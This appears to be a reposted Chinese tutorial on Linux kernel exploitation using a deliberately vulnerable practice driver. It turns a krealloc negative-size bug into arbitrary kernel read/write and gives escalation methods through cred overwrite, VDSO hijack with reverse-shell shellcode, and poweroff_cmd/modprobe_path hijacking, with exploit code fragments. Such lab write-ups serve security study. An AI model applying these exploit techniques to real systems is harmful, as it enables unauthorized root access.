linux 负数_linux内核提权系列教程(2):任意地址读写到提权的4种方法

最新推荐文章于 2023-05-25 14:08:36 发布
最新推荐文章于 2023-05-25 14:08:36 发布
阅读量366 收藏
点赞数
文章标签: linux 负数

               8f657ea669b057def5028a97c7eb567f.gif

一、漏洞代码分析

代码见arbitrary.h

1.功能函数介绍

功能输入结构名输入结构功能
ARBITRARY_RW_INITinit_argssize初始化全局对象,存于g_mem_buffer。kmalloc(size)空间存于*data
ARBITRARY_RW_REALLOCrealloc_argsgrow; size;grow为1则扩充,为0则缩小。data_size=g_mem_buffer->data_size + args->size;data=krealloc(g_mem_buffer->data, new_size+1, GFP_KERNEL);
ARBITRARY_RW_READread_args*buff; count;copy_to_user(buff, g_mem_buffer->data + pos, count);
ARBITRARY_RW_SEEKseek_argsnew_pos;pos = s_args->new_pos;
ARBITRARY_RW_WRITEwrite_args*buff; count;copy_from_user(g_mem_buffer->data + pos, w_args->buff, count);

全局对象地址存于g_mem_buffer:

// 全局对象typedef struct mem_buffer {  size_t data_size;  char *data;  loff_t pos;}mem_buffer;

2. 漏洞分析

static int realloc_mem_buffer(realloc_args *args)    {        if(g_mem_buffer == NULL)            return -EINVAL;        size_t new_size;        char *new_data;        //We can overflow size here by making new_size = -1        if(args->grow)            new_size = g_mem_buffer->data_size + args->size;          else            new_size = g_mem_buffer->data_size - args->size;        //new_size here will equal 0 krealloc(..., 0) = ZERO_SIZE_PTR        new_data = krealloc(g_mem_buffer->data, new_size+1, GFP_KERNEL);        //missing check for return value ZERO_SIZE_PTR        if(new_data == NULL)            return -ENOMEM;        g_mem_buffer->data = new_data;        g_mem_buffer->data_size = new_size;        printk(KERN_INFO "[x] g_mem_buffer->data_size = %lu [x]\n", g_mem_buffer->data_size);        return 0;    }

漏洞:realloc_mem_buffer()中未检查传入变量args->size的正负,可以传入负数。如果通过传入负数,使得new_size== -1,由于kmalloc(new_size+1),由于kmalloc(0)会返回0x10,这样g_mem_buffer->data == 0x10; g_mem_buffer->data_size == 0xffffffffffffffff,读写时只会检查是否满足((count + pos) < g_mem_buffer->data_size)条件,实现任意地址读写。

krealloc源码如下:

// /include/linux/slab.h#define ZERO_SIZE_PTR ((void *)16)// /mm/slab_common.cvoid *krealloc(const void *p, size_t new_size, gfp_t flags){    void *ret;    if (unlikely(!new_size)) {        kfree(p);        return ZERO_SIZE_PTR;    }    ret = __do_krealloc(p, new_size, flags);    if (ret && kasan_reset_tag(p) != kasan_reset_tag(ret))        kfree(p);    return ret;}//krealloc传入0时返回0x10

read_mem_buffer()函数如下,若满足条件((count + pos) < g_mem_buffer->data_size),则读取内容。若g_mem_buffer->data_size == 0xffffffffffffffff,则无论读取偏移多大,都满足本条件。

static int read_mem_buffer(char __user *buff, size_t count)    {        if(g_mem_buffer == NULL)            return -EINVAL;        loff_t pos;        int ret;        pos = g_mem_buffer->pos;        if((count + pos) > g_mem_buffer->data_size)            return -EINVAL;        ret = copy_to_user(buff, g_mem_buffer->data + pos, count);        return ret;    }

二、 漏洞利用

思路:ARBITRARY_RW_REALLOC 时,传入负数size,使得new_size == 0xffffffffffffffff,这样返回堆块地址为0x10,达到任意地址读写的目的。

1. 方法一:修改cred结构提权

(1)cred结构体

每个线程在内核中都对应一个线程栈、一个线程结构块thread_info去调度,结构体同时也包含了线程的一系列信息。

thread_info结构体存放位于线程栈的最低地址,对应的结构体定义(\arch\x86\include\asm\thread_info.h 55):

struct thread_info {    struct task_struct  *task;      /* main task structure */                          //     __u32           flags;      /* low level flags */    __u32           status;     /* thread synchronous flags */    __u32           cpu;        /* current CPU */    mm_segment_t        addr_limit;    unsigned int        sig_on_uaccess_error:1;    unsigned int        uaccess_err:1;  /* uaccess failed */};

thread_info中最重要的信息是task_struct结构体,定义在(\include\linux\sched.h 1390)。

//裁剪过后 struct task_struct {    volatile long state;    /* -1 unrunnable, 0 runnable, >0 stopped */    void *stack;    atomic_t usage;    unsigned int flags; /* per process flags, defined below */    unsigned int ptrace;... .../* process credentials */    const struct cred __rcu *ptracer_cred; /* Tracer's credentials at attach */    const struct cred __rcu *real_cred; /* objective and real subjective task                     * credentials (COW) */    const struct cred __rcu *cred;  /* effective (overridable) subjective task                     * credentials (COW) */    char comm[TASK_COMM_LEN]; /* executable name excluding path                     - access with [gs]et_task_comm (which lock                       it with task_lock())                     - initialized normally by setup_new_exec *//* file system info */    struct nameidata *nameidata;#ifdef CONFIG_SYSVIPC/* ipc stuff */    struct sysv_sem sysvsem;    struct sysv_shm sysvshm;#endif... ... };

其中,cred结构体(\include\linux\cred.h 118)就表示该线程的权限。只要将结构体的uid~fsgid全部覆写为0即可提权该线程(root uid为0)。前28字节!!!!

struct cred {    atomic_t    usage;#ifdef CONFIG_DEBUG_CREDENTIALS    atomic_t    subscribers;    /* number of processes subscribed */    void        *put_addr;    unsigned    magic;#define CRED_MAGIC  0x43736564#define CRED_MAGIC_DEAD 0x44656144#endif    kuid_t      uid;        /* real UID of the task */    kgid_t      gid;        /* real GID of the task */    kuid_t      suid;       /* saved UID of the task */    kgid_t      sgid;       /* saved GID of the task */    kuid_t      euid;       /* effective UID of the task */    kgid_t      egid;       /* effective GID of the task */    kuid_t      fsuid;      /* UID for VFS ops */    kgid_t      fsgid;      /* GID for VFS ops */    unsigned    securebits; /* SUID-less security management */    kernel_cap_t    cap_inheritable; /* caps our children can inherit */    kernel_cap_t    cap_permitted;  /* caps we're permitted */    kernel_cap_t    cap_effective;  /* caps we can actually use */    kernel_cap_t    cap_bset;   /* capability bounding set */    kernel_cap_t    cap_ambient;    /* Ambient capability set */#ifdef CONFIG_KEYS    unsigned char   jit_keyring;    /* default keyring to attach requested                     * keys to */    struct key __rcu *session_keyring; /* keyring inherited over fork */    struct key  *process_keyring; /* keyring private to this process */    struct key  *thread_keyring; /* keyring private to this thread */    struct key  *request_key_auth; /* assumed request_key authority */#endif#ifdef CONFIG_SECURITY    void        *security;  /* subjective LSM security */#endif    struct user_struct *user;   /* real user ID subscription */    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */    struct group_info *group_info;  /* supplementary groups for euid/fsgid */    struct rcu_head rcu;        /* RCU deletion hook */};
(2)漏洞利用

思路:利用任意读找到cred结构体,再利用任意写,将用于表示权限的数据位写0,即可提权。

搜索cred结构体:task_struct里有个char comm[TASK_COMM_LEN];结构,这个结构可通过prctl[1]函数中的PR_SET_NAME功能,设置为一个小于16字节的字符串。

感慨:task_struct这么大,居然能找到这个结构,还能找到prctl能修改该字符串,tql。

PR_SET_NAME (since Linux 2.6.9)    设置调用线程的name,name由arg2指定,长度最多16字节,包含终止符。也可以使用pthread_setname_np(3)设置该name,用pthread_getname_np(3)获得name。

方法:设定该值作为标记,利用任意读找到该字符串,即可找到task_structure,进而找到cred结构体,再利用任意写提权。

确定爆破范围:task_structure是通过调用kmem_cache_alloc_node()分配的,所以kmem_cache_alloc_node应该存在内核的动态分配区域。(\kernel\fork.c 140)。kernel内存映射[2]

static inline struct task_struct *alloc_task_struct_node(int node){    return kmem_cache_alloc_node(task_struct_cachep, GFP_KERNEL, node);}

根据内存映射图,爆破范围应该在0xffff880000000000~0xffffc80000000000。

(3)整合利用步骤

完整代码见exp_cred.c

//  爆破出 cred地址    i_args.size=0x100;    ioctl(fd, ARBITRARY_RW_INIT, &i_args);    rello_args.grow=0;    rello_args.size=0x100+1;    ioctl(fd,ARBITRARY_RW_REALLOC,&rello_args);    puts("[+] We can read and write any memory! [+]");    for (size_t addr=START_ADDR; addr0x1000)    {        read_mem(fd,addr,buf,0x1000);        result=memmem(buf,0x1000,target,16);        if (result)        {            printf("[+] Find try2findmesauce at : %p\n",result);            cred=*(size_t *)(result-0x8);            real_cred=*(size_t *)(result-0x10);            if ((cred || 0xff00000000000000) && (real_cred == cred))            {                target_addr=addr+result-(long int)(buf);                printf("[+] found task_struct 0x%x\n",target_addr);                printf("[+] found cred 0x%lx\n",real_cred);                break;            }        }    }    if (result==0)    {        puts("[-] not found, try again! \n");        exit(-1);    }    // 修改cred    memset((char *)root_cred,0,28);    write_mem(fd,cred,root_cred,28);

成功提权:

b568851820e665e2ad7e888101192ce2.png
1-exp_cred_succeed.png

2. 方法二:劫持VDSO

VDSO是内核通过映射方法与用户态共享一块物理内存,从而加快执行效率,也叫影子内存。当在内核态修改内存时,用户态所访问到的数据同样会改变,这样的数据区在用户态有两块,vdsovsyscall

gdb-peda$ cat /proc/self/maps00400000-0040c000 r-xp 00000000 08:01 561868                             /bin/cat0060b000-0060c000 r--p 0000b000 08:01 561868                             /bin/cat0060c000-0060d000 rw-p 0000c000 08:01 561868                             /bin/cat01cff000-01d20000 rw-p 00000000 00:00 0                                  [heap]...7fff937d7000-7fff937d9000 r-xp 00000000 00:00 0                          [vdso]ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
(1)VDSO介绍

vsyscall和VDSO都是为了避免传统系统调用模式INT 0x80/SYSCALL造成的内核空间和用户空间的上下文切换。vsyscall只允许4个系统调用,且在每个进程中静态分配了相同的地址;VDSO是动态分配的,地址随机,可提供超过4个系统调用,VDSO是glibc库提供的功能。

VDSO—Virtual Dynamic Shared Object。本质就是映射到内存中的.so文件,对应的程序可以当普通的.so来使用其中的函数。VDSO所在的页,在内核态是可读、可写的,在用户态是可读、可执行的。

VDSO在每个程序启动的加载过程如下:

#0  remap_pfn_range (vma=0xffff880000bba780, addr=140731259371520, pfn=8054, size=4096, prot=...) at mm/memory.c:1737#1  0xffffffff810041ce in map_vdso (image=0xffffffff81a012c0 , calculate_addr=) at arch/x86/entry/vdso/vma.c:151#2  0xffffffff81004267 in arch_setup_additional_pages (bprm=, uses_interp=) at arch/x86/entry/vdso/vma.c:209#3  0xffffffff81268b74 in load_elf_binary (bprm=0xffff88000f86cf00) at fs/binfmt_elf.c:1080#4  0xffffffff812136de in search_binary_handler (bprm=0xffff88000f86cf00) at fs/exec.c:1469

在map_vdso中首先查找到一块用户态地址,将该块地址设置为VM_MAYREAD|VM_MAYWRITE|VM_MAYEXEC,利用remap_pfn_range将内核页映射过去。

dump vdso代码:

//dump_vdos.c// 获取gettimeofday 字符串的偏移,便于爆破;dump vdso还是需要在程序中爆破VDSO地址,然后gdb中断下,$dump memory即可(VDSO地址是从ffffffff开头的)。#include #include #include #include #include   #include int main(){    int test;    size_t result=0;    unsigned long sysinfo_ehdr = getauxval(AT_SYSINFO_EHDR);    result=memmem(sysinfo_ehdr,0x1000,"gettimeofday",12);    printf("[+]VDSO : %p\n",sysinfo_ehdr);    printf("[+]The offset of gettimeofday is : %x\n",result-sysinfo_ehdr);    scanf("Wait! %d", test);      /*     gdb break point at 0x400A36    and then dump memory    why only dump 0x1000 ???    */    if (sysinfo_ehdr!=0){        for (int i=0;i<0x2000;i+=1){            printf("%02x ",*(unsigned char *)(sysinfo_ehdr+i));        }    }}
(2)利用思路

1.获取vdso的映射地址(爆破),vdso的范围在0xffffffff80000000~0xffffffffffffefff。2.通过劫持task_prctl,将其修改成为set_memory_rw3.然后传入VDSO的地址,将VDSO修改成为可写的属性。4.用shellcode覆盖部分vDSO(shellcode只为root进程创建反弹shell,可以通过调用 0x66—sys_getuid系统调用并将其与0进行比较;如果没有root权限,我们继续调用0x60—sys_gettimeofday系统调用。同样在root进程当中,我们不想造成更多的问题,我们将通过0x39系统调用 fork一个子进程,父进程继续执行sys_gettimeofday,而由子进程来执行反弹shell。)5.调用gettimeofday函数或通过prtcl的系统调用,让内核调用shellcode提权。所用shellcode可见https://gist.github.com/itsZN/1ab36391d1849f15b785(它将连接到127.0.0.1:3333并执行”/bin/sh”),用"nc -l -p 3333 -v"链接即可;shellcode写到gettimeofday附近,通过dump vDSO确定,本题是0xca0。

(3)整合利用步骤

由于进程不会主动调用gettimeofday来触发shellcode,所以我们自己写一个循环程序,不断调用gettimeofday。

//sudo_me.c           一定要动态编译,不然不会调用gettimeofday函数,还要在_install根目录下创建lib64文件,文件里放需要用到的库(ld-linux-x86-64.so.2 和 libc.so.6)。#include int main(){    while(1){        puts("111");        sleep(1);        gettimeofday();    }}

完整exp见exp_VDSO.c

711617420ea62c8550bca0642e69dfb4.png
2-exp_VDSO_succeed.png

3. 方法三:利用call_usermodehelper()

(1)call_usermodehelper()原理

最初原理可见New Reliable Android Kernel Root Exploitation Techniques[3]

prctl的原理已在绕过内核SMEP姿势总结与实践[4]中分析过,就不再赘述。

由于prctl第一个参数是int类型,在64位系统中被截断,所以不能正确传参。

call_usermodehelper(\kernel\kmod.c 603),这个函数可以在内核中直接新建和运行用户空间程序,并且该程序具有root权限,因此只要将参数传递正确就可以执行任意命令(注意命令中的参数要用全路径,不能用相对路径)。但其中提到在安卓利用时需要关闭SEAndroid。

我们要劫持task_prctlcall_usermoderhelper吗,不是的,因为这里的第一个参数也是64位的,也不能直接劫持过来。但是内核中有些代码片段是调用了Call_usermoderhelper的,可以转化为我们所用(通过它们来执行用户代码或访问用户数据,绕过SMEP)。

也就是有些函数从内核调用了用户空间,例如kernel/reboot.c中的__orderly_poweroff函数中调用了run_cmd参数是poweroff_cmd,而且poweroff_cmd是一个全局变量,可以修改后指向我们的命令。

static int __orderly_poweroff(bool force){    int ret;    ret = run_cmd(poweroff_cmd);    if (ret && force) {        pr_warn("Failed to start orderly shutdown: forcing the issue\n");        /*         * I guess this should try to kick off some daemon to sync and         * poweroff asap.  Or not even bother syncing if we're doing an         * emergency shutdown?         */        emergency_sync();        kernel_power_off();    }    return ret;}static void poweroff_work_func(struct work_struct *work){    __orderly_poweroff(poweroff_force);}
(2)利用步骤

完整利用代码见exp_run_cmd.c

1.利用kremalloc的问题,达到任意地址读写的能力2.通过快速爆破,泄露出VDSO地址。3.利用VDSO和kernel_base相差不远的特性,泄露出内核基址。(泄露VDSO是为了泄露内核基址?)4.篡改prctl的hook为selinux_disable函数的地址5.调用prctl使得selinux失效(INetCop Security给出的思路中要求的一步)6.篡改poweroff_cmd使其等于我们预期执行的命令("/bin/chmod 777 /flag\0")。或者将poweroff_cmd处改为一个反弹shell的binary命令,监听端口就可以拿到shell。7.篡改prctl的hook为orderly_poweroff8.调用prctl执行我们预期的命令,达到内核提权的效果。

其中第4、5步是安卓root必须的两步,本题linux环境下不需要。

利用成功截图如下:

50fc6f9077cf3a0839a05fa63e747168.png
3-exp_run_cmd_succeed.png
(3)总结可劫持的变量

不需要劫持函数虚表,不需要传参数那么麻烦,只需要修改变量即可提权。

1.modprobe_path

// /kernel/kmod.cchar modprobe_path[KMOD_PATH_LEN] = "/sbin/modprobe";// /kernel/kmod.cstatic int call_modprobe(char *module_name, int wait)     argv[0] = modprobe_path;    info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,                     NULL, free_modprobe_argv, NULL);    return call_usermodehelper_exec(info, wait | UMH_KILLABLE);// /kernel/kmod.cint __request_module(bool wait, const char *fmt, ...)    ret = call_modprobe(module_name, wait ? UMH_WAIT_PROC : UMH_WAIT_EXEC);

__request_module - try to load a kernel module

触发:可通过执行错误格式的elf文件来触发执行modprobe_path指定的文件。

2.poweroff_cmd

// /kernel/reboot.cchar poweroff_cmd[POWEROFF_CMD_PATH_LEN] = "/sbin/poweroff";// /kernel/reboot.cstatic int run_cmd(const char *cmd)    argv = argv_split(GFP_KERNEL, cmd, NULL);    ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);// /kernel/reboot.cstatic int __orderly_poweroff(bool force)        ret = run_cmd(poweroff_cmd);

触发:执行__orderly_poweroff()即可。

3.uevent_helper

// /lib/kobject_uevent.c#ifdef CONFIG_UEVENT_HELPERchar uevent_helper[UEVENT_HELPER_PATH_LEN] = CONFIG_UEVENT_HELPER_PATH;// /lib/kobject_uevent.cstatic int init_uevent_argv(struct kobj_uevent_env *env, const char *subsystem){  ......    env->argv[0] = uevent_helper;   ...... }// /lib/kobject_uevent.cint kobject_uevent_env(struct kobject *kobj, enum kobject_action action,               char *envp_ext[]){......    retval = init_uevent_argv(env, subsystem);    info = call_usermodehelper_setup(env->argv[0], env->argv,                         env->envp, GFP_KERNEL,                         NULL, cleanup_uevent_env, env);......}

4.ocfs2_hb_ctl_path

// /fs/ocfs2/stackglue.cstatic char ocfs2_hb_ctl_path[OCFS2_MAX_HB_CTL_PATH] = "/sbin/ocfs2_hb_ctl";// /fs/ocfs2/stackglue.cstatic void ocfs2_leave_group(const char *group)    argv[0] = ocfs2_hb_ctl_path;    ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);

5.nfs_cache_getent_prog

// /fs/nfs/cache_lib.cstatic char nfs_cache_getent_prog[NFS_CACHE_UPCALL_PATHLEN] =                "/sbin/nfs_cache_getent";// /fs/nfs/cache_lib.cint nfs_cache_upcall(struct cache_detail *cd, char *entry_name)    char *argv[] = {        nfs_cache_getent_prog,        cd->name,        entry_name,        NULL    };    ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);

6.cltrack_prog

// /fs/nfsd/nfs4recover.cstatic char cltrack_prog[PATH_MAX] = "/sbin/nfsdcltrack";// /fs/nfsd/nfs4recover.cstatic int nfsd4_umh_cltrack_upcall(char *cmd, char *arg, char *env0, char *env1)    argv[0] = (char *)cltrack_prog;    ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);

4. 方法四:劫持tty_struct

找不到mov rsp,raxmov rsp,[rbx+xx]这样的gadget,有点尴尬。

具体方法还是参考call_usermodehelper提权路径变量总结[5],其中总结了如何劫持tty_struct中的write和ioctl两种方法。

参考:

https://www.jianshu.com/p/07994f8b2bb0

https://invictus-security.blog/2017/06/

https://github.com/invictus-0x90/vulnerable_linux_driver

https://www.jianshu.com/p/a2259cd3e79e

文章首发于先知-linux内核提权系列教程(2):任意地址读写到提权的4种方法[6]

说明:实验所需的驱动源码、bzImage、cpio文件见我的github[7]进行下载。

本教程适合对漏洞提权有一定了解的同学阅读,具体可以看看我先知之前的文章,或者我的简书[8]

从任意地址读写到提权的方法,可以参考【linux内核漏洞利用】StringIPC—从任意读写到权限提升三种方法[9]

References

[1] prctl: http://man7.org/linux/man-pages/man2/prctl.2.html[2] kernel内存映射: https://jin-yang.github.io/post/kernel-memory-virtual-physical-map.html[3] New Reliable Android Kernel Root Exploitation Techniques: http://powerofcommunity.net/poc2016/x82.pdf[4] 绕过内核SMEP姿势总结与实践: https://www.jianshu.com/p/3d707fac499a[5] call_usermodehelper提权路径变量总结: https://www.jianshu.com/p/a2259cd3e79e[6] 先知-linux内核提权系列教程(2):任意地址读写到提权的4种方法: https://xz.aliyun.com/t/6296[7] 我的github: https://github.com/bsauce/kernel_exploit_series[8] 我的简书: https://www.jianshu.com/u/a12c5b882be2[9] 【linux内核漏洞利用】StringIPC—从任意读写到权限提升三种方法: https://www.jianshu.com/p/07994f8b2bb0

往期推荐

D-Link service.cgi远程命令执行漏洞分析

linux内核提权系列教程(1):堆喷射函数sendmsg与msgsend利用

Dlink getcfg.php远程敏感信息读取漏洞分析

TP Link SR20 ACE漏洞分析

a3d59b88c9bded1360c9b9fe014398e4.png
weixin_39844549
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
修改内核在哪_【linux内核漏洞利用】call_usermodehelper提权路径变量总结
weixin_42551227的博客
12-21 364
本文通过分析STARCTF 2019 hackme 题目,来总结一下提权时可修改的变量。不需要劫持函数虚表,不需要传参数那么麻烦,只需要修改变量,然后一定条件触发即可提权。知识点(1)内核堆分配释放规则:基于slub分配器,其释放过的堆块类似于glibc的fastbin,首先是一后入先出结构,并且其存在FD指针指向下一块空闲的块...
linux 下c的printf实现 2加入double的负数
11-13
愿printf实现的基础上,加入double的负数
linux 内核提权总结(demo+exp分析) -- 任意读写(三)
北观止的博客
12-23 289
hijack_prctl篇 prctl函数: 用户态函数,可用于定制进程参数,非常适合和内核进行交互 用户态执行prctl函数后触发prctl系统调用 内核接收参数后执行security_task_prctl security_task_prctl执行hook.task_prctl poweroff_work_func函数: 内核函数,执行 run_cmd(poweroff_cmd),即root权限执行poweroff_cmd 攻击流程: 劫持hook.task_
linux 内核提权总结(demo+exp分析) -- 任意读写(四)
北观止的博客
12-23 285
hijack_modprobe_path篇 原理同hijack_prctl, 当用户执行错误格式的elf文件时内核调用call_usermodehelper(char *modprobe_path ...) 修改modprobe后,即可实现root权限任意命令执行 攻击流程 (内核任意读写漏洞)内核修改全局变量 modprobe_path为目标指令 写入错误格式elf文件,并手动执行,触发 原文地址 一. 利用步骤 1. 定位modprobe_path(开启kaslr
linux之程序编译调试
Kattlin_gsc的博客
02-05 364
嵌入式开发基础知识 正数 5 负数-5 原码 00000101 10000101(1为符号位 0正1负) 反码 00000101 11111010(符号位不变) 补码 00000101 ...
linux下int转二进制字符串的方法_int转二进制字符串的方法_QT_linux_
10-02
Linux环境下,将整型(int)数值转换为二进制字符串是一项常见的编程任务,尤其是在进行低级别编程或者处理位操作时。由于C++标准库中并没有直接提供将整数转换为二进制字符串的函数,程序员往往需要自定义函数来...
linux_file_op.zip_file操作_linux fopen_open
09-14
Linux操作系统中,"一切皆文件"的概念是其核心哲学之一。这包括硬件设备、网络接口,甚至是进程间通信的管道。在这个理念下,文件操作是Linux编程的基础,特别是对于I/O操作而言。本篇文章将深入探讨Linux系统下的...
linux-c.rar_linux c select_linux select_select c语言
09-21
Linux系统编程中,`select`函数是一常用的I/O多路复用技术,它允许程序同时监控多个文件描述符(file descriptors),等待其中任意一个或多个准备好读写操作。这个功能对于编写高并发、非阻塞的服务器端程序至关...
UART1.rar_Uart1Sends_linux_select_uart select函数
09-20
在这个“UART1.rar_Uart1Sends_linux_select_uart select函数”压缩包中,我们关注的是如何利用select函数来实现UART1的发送和接收功能。下面将详细介绍这个主题。 UART1是嵌入式系统或开发板上常见的硬件接口,...
TargetInsn.rar_Linux/Unix编程_Unix_Linux_
08-11
6. **系统调用**:Linux/Unix提供了一系列的系统调用来与内核交互,如打开文件、读写数据、创建进程等。熟练使用这些调用是系统编程的核心技能。 7. **多线程与并发**:在现代计算中,多线程和并发是常见的,理解...
linux 内核断言,Linux Kernel 代码艺术——编译时断言
weixin_42519126的博客
05-01 204
系列文章主要写我在阅读Linux内核过程中,关注的比较难以理解但又设计巧妙的代码片段(不关注OS的各个模块的设计思想,此部分我准备写在“深入理解Linux Kernel” 系列文章中),一来通过内核代码复习一下C语言及汇编语言的语法,二来学习内核开发大牛们书写代码的风格及思路。在内核文件 include/linux/bug.h中,有下面两行的宏定义:123456/* Force a compil...
linux kernel pwn学习之劫持vdso
seaaseesa的博客
03-06 2191
Hijack vdso VDSO就是Virtual Dynamic Shared Object,是内核提供的虚拟的.so,这个.so文件不在磁盘上,而是在内核里头。内核把包含某.so的内存页在程序启动的时候映射入其内存空间,对应的程序就可以当普通的.so来使用里面的函数。Vdso里面封装了这几个函数,其作用主要是加快对于某些对速度要求很高的系统调用,更多详细信息可以查看https://blog....
使用call_usermodehelper在Linux内核中直接运行用户空间程序
weixin_34320159的博客
07-19 586
                                                                                                                     by沈东良/良少http://blog.csdn.net/shendl2011.07.19 系统初始化时ke...
call_usermodehelper()函数分析(内核态调用用户态函数)
热门推荐
sandwich125的博客
06-05 1万+
如何在Linux内核中执行某些用户态程序或系统命令?在用户态中,可以通过execve()实现;在内核态,则可以通过call_usermodehelpere()实现该功能。如果您查阅了call_usermodehelper()内核函数的源码实现,就可以发现该函数最终会执行do_execve()。而execve系统调用在经历内核的系统调用流程后,也会最终调用do_execve()。 代码实例1 内核态...
call_usermodehelper函数分析
Jahol_Fan的博客
11-07 3765
 内核中的call_usermodehelper函数可以实现在内核空间调用用户空间的应用程序。 在linux内核中,实现关机的接口:__orderly_poweroff,该接口的主要作用是:在内核空间,调用用户空间的应用程序“/sbin/poweroff”,达到关机的目的。通过调该接口,可以实现在内核中实现“长按关机”操作。 char poweroff_cmd[POWEROFF_CMD_P...
krealloc 源码分析
jason的笔记
02-27 2995
kernel 中提供了一个函数krealloc,这个函数可以重新申请一块memory,但是会将原来memory中的内容copy过来,比较适合 0 size 数组的问题. 其使用举例如下:         fwspec = krealloc(dev->iommu_fwspec, size, GFP_KERNEL); 第一个参数是需要扩大size的指针,以数组为例的话,就是数组头指针,第二个是
Linux内核:内存管理——Vmalloc
最新发布
m0_74282605的博客
05-25 920
在进行vmalloc代码走读之前,先简单看一下两个重要的数据结构:struct vm_struct(vmalloc描述符)和struct vmap_area(记录在vmap_area_root中的vmalooc分配情况和vmap_area_list列表中)。map_vm_area对分配的页面进行了映射,map_vm_area-->vmap_page_range-->vmap_page_range_noflush。下面是__vmalloc_node_range的主要子函数,反映了其主要工作内容。
Linux 2.6 对新型 CPU 快速系统调用的支持
新博客请访问- http://oliveryang.net
07-06 5069
 <!----> Linux 2.6 对新型 CPU 快速系统调用的支持 转载自:IBMdeveloperWorks 中国 刘子锐Linux 爱好者2004 年 5 月 文章分析了在 Linu
Linux内核API详解:驱动开发与原子操作
Linux内核函数手册是Linux系统开发人员的重要参考资料,它涵盖了Linux内核的核心编程接口,这些接口对于理解并编写高效、稳定且兼容的驱动程序至关重要。此文档遵循GNU通用公共许可证(GPL)版本2或更高版本,确保了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值